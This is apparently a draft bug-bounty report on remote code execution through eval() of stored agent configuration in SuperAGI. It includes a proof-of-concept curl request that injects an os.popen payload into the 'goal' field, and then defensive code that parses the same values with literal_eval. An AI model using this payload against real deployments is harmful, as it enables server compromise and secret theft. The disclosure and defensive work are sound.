# SuperAGI — RCE via unsafe eval() of database-stored agent configuration

STATUS: ALMOST_REPORT (needs investigation; do not submit)
readiness: NEEDS_INVESTIGATION
program: SuperAGI | platform: huntr | repo: TransformerOptimus/SuperAGI | commit: c3c1982e

````
Repository URL: https://github.com/TransformerOptimus/SuperAGI
Package Manager: pip
Version Affected: latest (commit c3c1982e)
Vulnerability Type: Code Injection
CVSS:
  Attack Vector: Network
  Attack Complexity: Low
  Privileges Required: Low
  User Interaction: None
  Scope: Changed
  Confidentiality: High
  Integrity: High
  Availability: High
Title: RCE via eval() on database-stored agent goal/instruction/constraints values
Impact: Any authenticated user able to create or modify agent configuration can execute arbitrary Python/OS commands on the SuperAGI server. This can lead to full compromise of the application container/host context, secret theft, data tampering, and lateral movement into connected infrastructure.
Description:

# Description

SuperAGI stores agent configuration fields (including `goal`, `instruction`, and `constraints`) as string values in the database and later parses them using Python `eval()` in runtime model methods.

Because these values originate from user-controlled API input (for authenticated users creating/updating agents), a malicious user can persist Python expressions that are executed when configuration is read back. This creates a reliable remote code execution path.

This is **distinct from CVE-2024-9439**. CVE-2024-9439 covered `eval()` in the `agent_template` update API path. The issue here affects additional runtime model/config flows (`agent.py`, `agent_execution_config.py`) that evaluate DB-backed config values during normal operation.

Affected code paths include:

1. `superagi/models/agent_execution_config.py` line 110 — `eval_agent_config()` returns `eval(value)` for `goal`, `instruction`, and `tools`
2. `superagi/models/agent_execution_config.py` lines 123/133/136/161/171/174 — repeated `eval()` on DB fields in config/result handling
3. `superagi/models/agent.py` line 116 — `eval_agent_config()` evaluates string-backed fields including `goal`, `constraints`, `instruction`
4. `superagi/controllers/agent_template.py` lines 251 and 466 — controller flow also evaluates stored values

# Proof of Concept

1. Start SuperAGI (default docker-compose deployment is sufficient).
2. Authenticate as a normal user.
3. Create an agent with a malicious string payload in a config field that later gets evaluated.

Example request:

```bash
curl -sS -X POST http://localhost:8001/api/agent/create \
  -H 'Content-Type: application/json' \
  -H 'Authorization: Bearer ' \
  -d '{
    "name": "poc-agent",
    "description": "eval poc",
    "goal": ["__import__('\''os'\'').popen('\''id'\'').read()"],
    "instruction": ["normal"],
    "constraints": ["normal"]
  }'
```

4. Trigger any workflow/API call that reads agent configuration (agent load/list/get path).
5. The application executes the payload when evaluating the stored value with `eval()`.

Observed effect: command execution output is produced server-side under the SuperAGI application user context.

### Impact

Any authenticated user able to create or modify agent configuration can execute arbitrary Python/OS commands on the SuperAGI server. This can lead to full compromise of the application container/host context, secret theft, data tampering, and lateral movement into connected infrastructure.

### Occurrences

```
Permalink: https://github.com/TransformerOptimus/SuperAGI/blob/c3c1982e7bd6a11cfed53c5a193ea502f924b1b6/superagi/models/agent_execution_config.py#L110
Description: eval_agent_config() evaluates DB-backed config values directly with eval()

Permalink: https://github.com/TransformerOptimus/SuperAGI/blob/c3c1982e7bd6a11cfed53c5a193ea502f924b1b6/superagi/models/agent_execution_config.py#L123-L136
Description: Multiple result/config paths repeatedly evaluate stored string fields

Permalink: https://github.com/TransformerOptimus/SuperAGI/blob/c3c1982e7bd6a11cfed53c5a193ea502f924b1b6/superagi/models/agent_execution_config.py#L161-L174
Description: Additional eval() usage on DB-derived config values

Permalink: https://github.com/TransformerOptimus/SuperAGI/blob/c3c1982e7bd6a11cfed53c5a193ea502f924b1b6/superagi/models/agent.py#L116
Description: Agent model eval_agent_config() evaluates goal/constraints/instruction values

Permalink: https://github.com/TransformerOptimus/SuperAGI/blob/c3c1982e7bd6a11cfed53c5a193ea502f924b1b6/superagi/controllers/agent_template.py#L251
Description: Controller evaluates stored template config before conversion

Permalink: https://github.com/TransformerOptimus/SuperAGI/blob/c3c1982e7bd6a11cfed53c5a193ea502f924b1b6/superagi/controllers/agent_template.py#L466
Description: Controller path re-evaluates stored tool/config values
```

### References

```
URL: https://cwe.mitre.org/data/definitions/95.html
Name: CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code

URL: https://owasp.org/www-community/attacks/Direct_Dynamic_Code_Evaluation_Eval_Injection
Name: OWASP — Direct Dynamic Code Evaluation (Eval Injection)

URL: https://huntr.com/bounties/4091e89a-cce1-41f2-acc0-c0e42b4b3f4f
Name: CVE-2024-9439 (related but different SuperAGI eval() attack surface)
```

Occurrences:
  Permalink: https://github.com/TransformerOptimus/SuperAGI/blob/c3c1982e7bd6a11cfed53c5a193ea502f924b1b6/superagi/models/agent_execution_config.py#L110
  Description: eval_agent_config() evaluates DB-backed config values directly with eval()

  Permalink: https://github.com/TransformerOptimus/SuperAGI/blob/c3c1982e7bd6a11cfed53c5a193ea502f924b1b6/superagi/models/agent_execution_config.py#L123-L136
  Description: Multiple result/config paths repeatedly evaluate stored string fields

  Permalink: https://github.com/TransformerOptimus/SuperAGI/blob/c3c1982e7bd6a11cfed53c5a193ea502f924b1b6/superagi/models/agent_execution_config.py#L161-L174
  Description: Additional eval() usage on DB-derived config values

  Permalink: https://github.com/TransformerOptimus/SuperAGI/blob/c3c1982e7bd6a11cfed53c5a193ea502f924b1b6/superagi/models/agent.py#L116
  Description: Agent model eval_agent_config() evaluates goal/constraints/instruction values

  Permalink: https://github.com/TransformerOptimus/SuperAGI/blob/c3c1982e7bd6a11cfed53c5a193ea502f924b1b6/superagi/controllers/agent_template.py#L251
  Description: Controller evaluates stored template config before conversion

  Permalink: https://github.com/TransformerOptimus/SuperAGI/blob/c3c1982e7bd6a11cfed53c5a193ea502f924b1b6/superagi/controllers/agent_template.py#L466
  Description: Controller path re-evaluates stored tool/config values
References:
  URL: https://cwe.mitre.org/data/definitions/95.html
  Name: CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code

  URL: https://owasp.org/www-community/attacks/Direct_Dynamic_Code_Evaluation_Eval_Injection
  Name: OWASP — Direct Dynamic Code Evaluation (Eval Injection)

  URL: https://huntr.com/bounties/4091e89a-cce1-41f2-acc0-c0e42b4b3f4f
  Name: CVE-2024-9439 (related but different SuperAGI eval() attack surface)
````
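
A defensive counterpart to the `eval()` pattern this report describes, as an added example that is not SuperAGI's code or a fix from the project: stored list fields are parsed with `ast.literal_eval` plus a type check, and an audit pass flags rows whose stored value is not a plain literal. The function names, the element types in `LIST_FIELDS` and the sample rows are assumptions constructed for illustration.

```python
import ast

# Assumed schema: field name -> element type of the stored list.
# Field names come from the report; the element types are an assumption.
LIST_FIELDS = {"goal": str, "instruction": str, "constraints": str, "tools": int}


def parse_stored_config(key, value):
    """Parse a DB-stored config string without ever executing it."""
    if key not in LIST_FIELDS:
        return value  # other fields stay plain strings
    try:
        # literal_eval accepts only literals; calls, names and attribute
        # access raise ValueError instead of running.
        parsed = ast.literal_eval(value)
    except (ValueError, SyntaxError, TypeError, RecursionError, MemoryError) as exc:
        raise ValueError(f"{key}: stored value is not a plain literal") from exc
    elem_type = LIST_FIELDS[key]
    if not isinstance(parsed, list) or not all(type(x) is elem_type for x in parsed):
        raise ValueError(f"{key}: expected list of {elem_type.__name__}")
    return parsed


def audit_rows(rows):
    """Return (row_id, key) for stored values the safe parser rejects."""
    flagged = []
    for row_id, key, value in rows:
        try:
            parse_stored_config(key, value)
        except ValueError:
            flagged.append((row_id, key))
    return flagged


# Constructed sample rows (id, key, value); not data from a real deployment.
SAMPLE_ROWS = [
    (1, "goal", "['summarise the weekly report']"),
    (2, "tools", "[3, 7]"),
    (3, "goal", "__import__('os').popen('id').read()"),  # payload string from the PoC
    (4, "constraints", "{'not': 'a list'}"),
    (5, "name", "poc-agent"),
]

if __name__ == "__main__":
    print(audit_rows(SAMPLE_ROWS))
```

The audit treats any rejected row as suspect, so it also surfaces malformed but harmless values that need manual review.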